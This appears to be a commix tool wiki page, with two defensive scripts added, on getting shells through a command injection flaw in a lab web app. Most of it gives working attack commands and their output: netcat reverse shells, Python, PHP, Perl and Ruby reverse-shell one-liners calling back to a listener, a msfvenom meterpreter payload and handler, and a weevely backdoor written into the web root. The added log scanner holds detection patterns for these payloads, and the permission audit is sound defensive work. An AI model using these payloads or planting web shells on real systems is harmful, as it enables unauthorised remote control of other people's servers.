Getting Shells
Step 1. Set up a netcat listener for the reverse shell.
In a shell on your machine, run nc -lvp 1234 to begin listening for inbound connections on port 1234.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
Step 2. Execute netcat via commix.
In a separate shell, run:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=127.0.0.1" --os-cmd="nc -e /bin/sh 192.168.178.3 1234"
or
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=127.0.0.1" --os-cmd="/bin/nc.traditional -e /bin/sh 192.168.178.3 1234"
or via the "reverse_tcp" shell option:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=127.0.0.1"
[...]
Pseudo-Terminal (type '?' for available options)
commix(os_shell) > reverse_tcp
commix(reverse_tcp) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
commix(reverse_tcp) > set LPORT 1234
LPORT => 1234
---[ Reverse TCP shells ]---
Type '1' to use a Netcat reverse TCP shell.
Type '2' for other reverse TCP shells.
commix(reverse_tcp) > 1
---[ Unix-like targets ]---
Type '1' to use the default Netcat on target host.
Type '2' to use Netcat for Busybox on target host.
Type '3' to use Netcat-Traditional on target host.
commix(reverse_tcp_netcat) > 3
Step 3. Enjoy the netcat reverse shell.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 36746
whoami
www-data
The following examples (inspired by Pentestmonkey's post "Reverse Shell Cheat Sheet") set up reverse shells to a netcat listener without using netcat on the target. Feel free to add your suggestions!
Step 1. Set up a netcat listener for the reverse shell.
In a shell on your machine, run nc -lvp 1234 to begin listening for inbound connections on port 1234.
root@kali:~/commix# nc -lvp 1234
listening on [any] 1234 ...
Step 2. Choose one of the following netcat-without-netcat reverse shell payloads.
Execute one of the following netcat-without-netcat reverse shell payloads through commix as a command (i.e. via the "--os-cmd" option):
1. Python-reverse-shell:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'
2. PHP-reverse-shell:
php -r '\$sock=fsockopen(\"192.168.178.3\",1234);exec(\"/bin/sh -i <%263 >%263 2>%263\");'
3. Perl-reverse-shell:
perl -e 'use Socket;\$i=\"192.168.178.3\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">%26S\");open(STDOUT,\">%26S\");open(STDERR,\">%26S\");exec(\"/bin/sh -i\");};'
4. Ruby-reverse-shell:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.178.3\",1234);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'
Suppose you want a reverse shell to IP "192.168.178.3" on port "1234" using the Python-reverse-shell payload. In a separate shell, type the following command:
root@kali:~/Desktop/commix# python commix.py --url="http://192.168.178.4/commix-testbed/scenarios/regular/GET/classic.php?addr=127.0.0.1" --os-cmd="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.178.3\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
Step 3. Enjoy your netcat-without-netcat reverse shell.
root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.178.3] from debian [192.168.178.4] 43712
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
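From the defender's side, every payload in this section and in the netcat section before it arrives as a request to the injectable parameter, so it is visible in the web server's access log. The following script is added here and is not part of commix or of this page: it URL-decodes each query parameter and matches it against indicator patterns modelled on the payloads above. The log lines are constructed, and the double-encoded '&' (%2526) is an assumption about how commix encodes the "%26" written in the payloads.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Indicator patterns modelled on the payloads shown above (a starting point, not a complete list).
INDICATORS = [
    ("netcat reverse shell", re.compile(r"\bnc(\.traditional)?\s+(-\S+\s+)*-e\s+/bin/sh")),
    ("python reverse shell", re.compile(r"\bpython\S*\s+-c\s+.*socket\.socket.*subprocess")),
    ("php reverse shell", re.compile(r"\bphp\s+-r\s+.*fsockopen")),
    ("perl reverse shell", re.compile(r"\bperl\s+-e\s+.*sockaddr_in.*exec")),
    ("ruby reverse shell", re.compile(r"\bruby\s+-rsocket\s+-e\s+.*TCPSocket")),
    ("interactive shell with fd redirection", re.compile(r"/bin/sh\s+-i\s+<&\d")),
    ("commix injection marker", re.compile(r"INJECT_HERE")),
]

# Common Log Format: client ident user [timestamp] "METHOD URL PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def decode_params(url):
    """Split the query string and URL-decode each value until it stops changing.
    Repeated decoding matters: the payloads above carry a double-encoded '&' (%2526 -> %26 -> &)."""
    params = []
    for part in urlsplit(url).query.split("&"):
        name, _, value = part.partition("=")
        previous = None
        while value != previous:
            previous, value = value, unquote_plus(value)
        params.append((name, value))
    return params

def scan_line(line):
    """Return {'ip', 'ts', 'hits'} for a log line whose query carries a known payload, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = [(name, label) for name, value in decode_params(m["url"])
            for label, pat in INDICATORS if pat.search(value)]
    return {"ip": m["ip"], "ts": m["ts"], "hits": hits} if hits else None

# Constructed sample lines mirroring the requests commix would send for the examples above (assumed encoding).
SAMPLE_LOG = [
    '192.168.178.3 - - [16/May/2015:03:11:42 -0400] "GET /cmd/normal.php?addr=127.0.0.1 HTTP/1.1" 200 353',
    '192.168.178.3 - - [16/May/2015:03:11:43 -0400] "GET /cmd/normal.php?addr=127.0.0.1%3Bnc+-e+%2Fbin%2Fsh+192.168.178.3+1234 HTTP/1.1" 200 353',
    '192.168.178.3 - - [16/May/2015:03:11:44 -0400] "GET /cmd/normal.php?addr=127.0.0.1%3Bphp+-r+%27%24sock%3Dfsockopen%28%22192.168.178.3%22%2C1234%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%25263+%3E%25263+2%3E%25263%22%29%3B%27 HTTP/1.1" 200 353',
]

if __name__ == "__main__":
    for result in filter(None, map(scan_line, SAMPLE_LOG)):
        print(result["ts"], result["ip"], result["hits"])
```

The first sample line is the benign request and produces no hit; the other two are flagged by parameter name and payload family.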
Step 1: Create the PHP meterpreter shell (via msfvenom).
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.3 LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php
Note: Don't forget to add <?php and ?> to the msfvenom.php file.
Step 2: Start the handler (via msfconsole).
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...
Step 3: Use commix to create the "msfvenom.php" file in the target's "/var/www/" directory and execute it.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"
Step 4: Enjoy your shell!
[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400
meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
Step 1: Create the PHP web shell.
weevely generate commix
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
Step 2: Use commix to create the "weevely.php" file in the target's "/var/www/html/cmd/" directory.
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"
Step 3: Enjoy your shell!
weevely http://192.168.178.4/cmd/weevely.php commix
[weevely ASCII-art banner] v1.1
Stealth tiny web shell
[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.178.4/weevely.session'
www-data@debian:/var/www/html/cmd $ ls -la
total 16
drwxrwxrwx 2 root root 4096 May 18 02:02 .
drwxrwxrwx 8 root root 4096 May 14 01:49 ..
-rw-rw-rw- 1 root root 353 May 8 03:28 normal.php
-rw-r--r-- 1 www-data www-data 606 May 18 02:02 weevely.php
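The listing above also shows why the file drop in this section and the msfvenom one worked, and how an administrator can spot it afterwards: the cmd directory and its parent are world-writable, normal.php is world-writable, and weevely.php is owned by www-data rather than root. The following audit script is added here and is not part of commix, weevely or this page; it parses an ls -la listing and flags those conditions, using a constructed copy of the session output as input.

```python
import re
from typing import NamedTuple

class Entry(NamedTuple):
    mode: str
    owner: str
    group: str
    name: str

# One 'ls -la' line: mode links owner group size month day time|year name
LS_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<name>.+)$")

def parse_ls(listing: str) -> list:
    """Parse 'ls -la' output; lines that are not entries (e.g. 'total 16') are skipped."""
    return [Entry(m["mode"], m["owner"], m["group"], m["name"])
            for m in map(LS_RE.match, listing.splitlines()) if m]

def audit(entries, web_user="www-data"):
    """Flag the conditions that let the web server write into its own document root, or betray that it did."""
    findings = []
    for e in entries:
        is_dir = e.mode[0] == "d"
        world_writable = e.mode[8] == "w"   # write bit for 'other'
        if is_dir and world_writable:
            findings.append((e.name, "world-writable directory: any process, including the web server, can create files here"))
        elif world_writable:
            findings.append((e.name, "world-writable file: the web server can overwrite it with its own code"))
        if e.name.endswith(".php") and e.owner == web_user:
            findings.append((e.name, f"PHP file owned by {web_user}: written by the web server, not deployed by an admin"))
    return findings

# Constructed listing copied from the weevely session shown above.
SAMPLE_LISTING = """\
total 16
drwxrwxrwx 2 root root 4096 May 18 02:02 .
drwxrwxrwx 8 root root 4096 May 14 01:49 ..
-rw-rw-rw- 1 root root 353 May 8 03:28 normal.php
-rw-r--r-- 1 www-data www-data 606 May 18 02:02 weevely.php
"""

if __name__ == "__main__":
    for name, reason in audit(parse_ls(SAMPLE_LISTING)):
        print(f"{name}: {reason}")
```

Run against a real web root (ls -la | python audit.py style, or by calling audit on os.scandir results) the same three checks give a quick inventory of where an injected command could land a file.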